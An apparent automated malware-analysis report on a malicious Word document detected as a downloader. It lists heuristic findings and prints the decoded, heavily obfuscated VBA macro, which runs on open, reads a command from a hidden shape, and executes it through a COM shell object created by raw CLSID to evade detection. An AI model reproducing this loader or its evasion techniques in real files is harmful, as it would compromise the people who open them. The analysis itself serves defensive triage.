MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Sagent-6770698-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-6770698-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
tVFqTQW = 34481543 + CByte(wbmaKk - Sqr(WRCFzE)) * hnjWEJKTd - IzMBQtJ * opTGBist / CDate(227834830) * 70487161 * 106106507 / (170155314 - Sin(219959538)) Set ukMzHfzwu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
tVFqTQW = 34481543 + CByte(wbmaKk - Sqr(WRCFzE)) * hnjWEJKTd - IzMBQtJ * opTGBist / CDate(227834830) * 70487161 * 106106507 / (170155314 - Sin(219959538)) Set ukMzHfzwu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9154 bytes |
SHA-256: 24a9459d67fc476ca49adbc5651bca077556fae9720531f2c8f77a4782507258 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
169 of 236 identifiers look randomly generated (e.g. 'MNjXrXSCdi') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wpdEzDp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case GcPVF
Case 263436650
THtHiwi = 191660783
lMHlsmEMv = Maavh
rKSStt = 302878662
Case 165349987
AzWsfFIcM = ChrW(74511125)
BKQTYCa = CDate(339146662)
BsLMsql = 106430339
End Select
wsSivs = 256104350 + CByte(UPzEwOkL - Sqr(huwurT)) * zoHoKApTs - PTCSPY * riLzXDia / CDate(3153011) * 204304949 * 60075319 / (287081616 - Sin(118075064))
On Error Resume Next
Select Case iNbfIAw
Case 121719036
FvvawL = 276936712
PPlhrVXl = wYhfYrm
uXVlhXpd = 140347976
Case 282054125
kjrUz = ChrW(25661779)
hCnmsEu = CDate(214692276)
akljE = 62795709
End Select
EoUDhrvEW = 201621771 + CByte(ArHDkb - Sqr(JjwHiRrAV)) * sjJwbt - jcArpGjQ * jtovWA / CDate(68613936) * 219605088 * 310521552 / (170807698 - Sin(297779734))
On Error Resume Next
Select Case bwsjZbzfF
Case 289083375
OUwnTNs = 122744589
zcAimzA = qMYTi
wuApDbE = 138925525
Case 243935618
DapWmER = ChrW(4972637)
wswzJwbbu = CDate(269750082)
TCjzwtSXo = 283571101
End Select
crWfMH = 198803648 + CByte(mvYYic - Sqr(wqsbAKjrL)) * qqXsl - MEcQGbikT * dCwudBWzz / CDate(185008084) * 200651955 * 85697153 / (282622219 - Sin(61020892))
Set ZYkGk = Shapes("MNjXrXSCdi")
On Error Resume Next
Select Case ibihtl
Case 24402893
zlVkoRAt = 693405
cfRov = kmSwbKNs
wpdtzqDAn = 203711241
Case 148449080
jljDbEsh = ChrW(314165613)
pjwwHTFNm = CDate(160850788)
krcXzCM = 161295610
End Select
dJYuDAlv = 341357095 + CByte(ULECA - Sqr(uBjkvaswM)) * tEfbCjJQQ - IEsGhJNj * Rjpba / CDate(33886899) * 8161701 * 193970129 / (264200308 - Sin(238016161))
On Error Resume Next
Select Case krVANzQdK
Case 139644904
kLwtE = 250804154
pXiMIji = tXbOOzFS
oGZoMdAX = 262214495
Case 205744771
JQqOZsplN = ChrW(159147862)
mRfEtBvG = CDate(65324508)
tNFzMqdu = 192772141
End Select
UDlYcjMp = 145991082 + CByte(TFMFU - Sqr(JHjzb)) * VRPClRMB - qkiNij * bNoFk / CDate(10571634) * 79505312 * 264921984 / (8269212 - Sin(337088490))
On Error Resume Next
Select Case cQFjTXHqi
Case 204005928
pTsrONhYH = 48950043
zFzOIRm = EdCQtf
WIdfzc = 274175824
Case 4421112
mcikAQiLm = ChrW(39192829)
zmEPpE = CDate(119238342)
MmDzLAq = 166339378
End Select
cKuKFGcfj = 10213677 + CByte(ozrinP - Sqr(kDOpsK)) * oDidWk - rkibL * ufbjG / CDate(20002261) * 39118320 * 251691701 / (82710700 - Sin(309965106))
WfOWA = "" + nmUop + hHGhPXD + DlNMuvP + ZYkGk.TextFrame.TextRange.Text + Xkzzupc + FWBDVjM + sDHlPt
On Error Resume Next
Select Case nMjVV
Case 30160650
jOWaswRiP = 45493870
IZuWoEi = sOcwQjoS
szpEuKWcH = 220358748
Case 322712112
wiANXZQN = ChrW(107835435)
bnmLiEQ = CDate(39447712)
DdSmRRQNO = 159963436
End Select
hXlBwjckt = 48444978 + CByte(FiUWCRi - Sqr(SLBntDds)) * wGMBpVqE - lPubj * mfYkSv / CDate(95028842) * 332639990 * 199840180 / (222891092 - Sin(38834161))
On Error Resume Next
Select Case KvPDri
Case 191297648
ZREFiN = 14420907
ZTzrtWiH = OJGWVlKU
WYUjTljUX = 250879166
Case 198720959
viGcwVjW = ChrW(162357136)
MIQdZXwD = CDate(209503444)
koqdMpzLK = 161118519
End Select
wdzSiztXP = 200417369 + CByte(RiLMTqLJY - Sqr(GjCHnc)) * IVULAp - iQKuXC * PPlWHRzW / CDate(65697959) * 338241681 * 4134581 / (934629 - Sin(201421381))
On Error Resume Next
Select Case vcMiGmVV
Case 129140243
mjwQDuE = 315158117
PwHiLNCqX = DtqojX
hDJpjME = 135707370
Case 70690743
bNiJUQdM = ChrW(233152322)
zBREwzEQ = CDate(225922523)
uMtaNAmCj = 237424333
End Select
KAbbc = 298625414 + CByte(jcMcA - Sqr(fflFtiIo)) * OrOUDvTd - dzknApd * EwhFiR / CDate(79943163) * 63355943 * 310337442 / (221345257 - Sin(99511558))
On Error Resume Next
Select Case aijliCfw
Case 142477893
hISUCGW = 14226887
qtujwaCu = hffIG
JzwkWRoK = 253712995
Case 194981335
ZDpzi = ChrW(141567755)
KtufvmLbI = CDate(172317384)
qsZBjL = 18276332
End Select
lfSCi = 51525766 + CByte(tBzFF - Sqr(JkzMo)) * DJZvJOv - kdXTiwUjP * rMXqsJbDU / CDate(84438727) * 213964587 * 54349214 / (180717504 - Sin(274030804))
On Error Resume Next
Select Case RGzSLKDC
Case 125939278
jVQIq = 36725401
JwjzLC = VddbPq
NPapai = 41618076
Case 287200199
FLkri = ChrW(48787822)
MZJtH = CDate(100769011)
nFDdzhhc = 257504231
End Select
tVFqTQW = 34481543 + CByte(wbmaKk - Sqr(WRCFzE)) * hnjWEJKTd - IzMBQtJ * opTGBist / CDate(227834830) * 70487161 * 106106507 / (170155314 - Sin(219959538))
Set ukMzHfzwu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case iiOiqA
Case 164646099
bKLMcinb = 114016733
WvihMlvX = NSiRpw
hnwVUZ = 82696935
Case 265222959
tpNonSW = ChrW(264230921)
zWkwVdiS = CDate(208878811)
NwtWOJ = 6275558
End Select
fvNzj = 307186509 + CByte(Tvhjhv - Sqr(qlqbilRTm)) * tBbaz - zimRrs * BnplBh / CDate(6706182) * 231290995 * 332089702 / (101738451 - Sin(113458398))
Const tcRWMjZ = 0
On Error Resume Next
Select Case RSfBfGjUB
Case 315105100
KNljKaVQd = 84764015
DREkMuMr = nPPYB
VmJwbu = 294937281
Case 228122774
PAXMOU = ChrW(325381757)
jiPNw = CDate(304701431)
oHJmGvwNh = 337192519
End Select
iGhks = 68830597 + CByte(nVLXAdop - Sqr(jumwY)) * PHUlFcWQn - NJlqcvmE * JYiRGjw / CDate(111114131) * 270717960 * 99506182 / (124783221 - Sin(313928693))
On Error Resume Next
Select Case DlMHoqz
Case 224563091
TYXsJv = 62035173
boVBYv = PMrhWzh
SorAzMEw = 88551315
Case 142188208
PHLOn = ChrW(67936010)
jGPwdf = CDate(275852842)
rbzRLQlr = 32584410
End Select
RvMDX = 291880822 + CByte(fRjQE - Sqr(DXJPbRVLM)) * IUczvK - dPGKWPAfj * ozNJYnd / CDate(314528346) * 304452013 * 13062551 / (5702838 - Sin(66837163))
ukMzHfzwu.Run@ WfOWA, tcRWMjZ
On Error Resume Next
Select Case IvpAnXrjb
Case 266364908
ZAjSBp = 191931568
AFwjhMuup = CcGzHGqzK
INwJMcvos = 241803611
Case 27851092
zXamKLIo = ChrW(296285901)
BlYMGbs = CDate(191709487)
DflkmIo = 156082336
End Select
QFBEq = 88789302 + CByte(jWVwfoV - Sqr(fLLkzWTwP)) * AJNmo - VnDXnbw * LjWFXhzOJ / CDate(254909657) * 32002073 * 178378384 / (323523941 - Sin(29194606))
On Error Resume Next
Select Case LNZOcoE
Case 333531499
CGaJuDMzU = 341821043
uFZka = jEjZqA
XTmzIXW = 105997166
Case 11057061
JzPJzCmmm = ChrW(109680534)
cFoonPFAP = CDate(173078773)
GzlaRN = 282026166
End Select
dosNPnLDl = 14918863 + CByte(nEjkvNwLV - Sqr(RPmRz)) * PYWkZvonC - sYBcLTwT * HWPpNTBV / CDate(272628350) * 77469207 * 160514777 / (45073434 - Sin(312546685))
On Error Resume Next
Select Case LuRKbK
Case 92027715
RWJiCCww = 240509802
DoasI = bJdhzXAWH
sNtWaJffL = 164760623
Case 272594995
bcDaHQ = ChrW(42842740)
tTmRjRhji = CDate(297689010)
nbJJjCO = 186669986
End Select
IvjjKHhAi = 153560651 + CByte(jQLAYa - Sqr(mJczwSD)) * rSTTX - oMnznDHbk * CLclWQIk / CDate(59035877) * 177299059 * 183083791 / (126792400 - Sin(117109786))
On Error Resume Next
Select Case dsNGnQbbu
Case 325072298
zASQU = 33533068
YRFKQtkX = ztUDRXfw
OWoff = 192339709
Case 259080049
zhvdbFbv = ChrW(125403047)
mSbTWQh = CDate(198464871)
ZtncUVKG = 226077694
End Select
smcXiuDbG = 144790576 + CByte(tIwvtdiu - Sqr(YwBuN)) * LFbHRzsA - pKutYTp * Iufkojb / CDate(289850899) * 209362990 * 78499474 / (223519411 - Sin(145405883))
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.